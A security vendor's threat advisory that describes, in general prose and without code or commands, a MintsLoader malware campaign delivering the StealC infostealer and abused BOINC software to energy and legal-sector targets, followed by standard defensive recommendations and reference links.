A cyber campaign has been identified using the MintsLoader malware loader to deliver secondary payloads, such as the StealC information stealer and the legitimate open-source network computing platform, BOINC. This campaign has primarily targeted sectors such as electricity, oil and gas, and legal services across the United States and Europe. Continue to review this Cybersecurity Threat Advisory in order to stay protected from this threat.
What is the threat?
MintsLoader is a PowerShell-based malware loader designed to deliver various secondary payloads to compromised systems. The infection typically begins when a user clicks on a malicious link in a phishing email or falls for a fake browser update notification. These links may lead to a compromised website or a direct download of an obfuscated JavaScript file. Upon execution, the JavaScript script triggers a PowerShell command that downloads and executes MintsLoader.
MintsLoader operates with a sophisticated command-and-control (C2) mechanism, using a Domain Generation Algorithm (DGA) to determine its C2 domain dynamically. This feature enables it to evade detection by traditional security tools that rely on static domain blocking. Once it establishes communication with the C2 server, MintsLoader retrieves additional payloads and executes them on the infected system.
One of MintsLoader’s primary payloads is StealC, an information-stealing malware designed to extract sensitive user data, including credentials, cookies, autofill information, and cryptocurrency wallet details, from various applications and web browsers. The attacker transmits the stolen information to their C2 server for further exploitation or sale on dark web marketplaces.
Additionally, MintsLoader has been observed deploying BOINC, an open-source software platform initially designed for distributed computing projects. While BOINC is not malicious, attackers leverage it to use the compromised device’s processing power surreptitiously. This could facilitate unauthorized cryptocurrency mining operations or be used as part of a larger botnet to conduct distributed denial-of-service (DDoS) attacks. By exploiting BOINC, attackers can abuse system resources without raising immediate suspicion, as the software may appear legitimate to system administrators.
Why is it noteworthy?
This campaign is significant due to its combination of sophisticated malware delivery techniques and the exploitation of legitimate software. The use of MintsLoader’s DGA for C2 communication makes it challenging for security solutions to detect and block malicious domains. Furthermore, the deployment of StealC poses a substantial risk to sensitive information, while the misuse of BOINC could lead to unauthorized utilization of system resources. The targeting of critical infrastructure sectors amplifies the potential impact, underscoring the importance of heightened vigilance and robust security measures.
What is the exposure or risk?
Organizations affected by this threat may experience significant data breaches, including the loss of confidential information and intellectual property. The unauthorized use of system resources through the deployment of BOINC could result in degraded system performance, increased operational costs, and potential involvement in illicit activities without the organization’s knowledge. Moreover, the compromise of systems within critical infrastructure sectors could have far-reaching consequences, potentially disrupting essential services and undermining public trust.
What are the recommendations?
Barracuda strongly recommends organizations to take these additional steps to defend against this threat:
- Conduct regular training sessions to educate employees about the dangers of phishing emails and the importance of not interacting with suspicious links or attachments.
- Deploy advanced email filtering solutions, such as Barracuda Email Protection, to detect and block malicious emails before they reach end-users.
- Use reputable endpoint protection platforms capable of detecting and preventing the execution of malicious scripts and payloads.
- Keep systems and software up-to-date with the latest security patches to reduce vulnerabilities that malware could exploit.
- Restrict the execution of unauthorized applications and scripts through application whitelisting policies.
References
For more in-depth information about the threat, please visit the following links:
- https://thehackernews.com/2025/01/mintsloader-delivers-stealc-malware-and.html
- https://cybersecuritynews.com/new-mintsloader-employs-domain-generation-algorithm-anti-vm-techniques
- https://thehackernews.com/2024/07/socgholish-malware-exploits-boinc.html
If you have any questions about this Cybersecurity Threat Advisory, don’t hesitate to get in touch with Barracuda Managed XDR’s Security Operations Center.
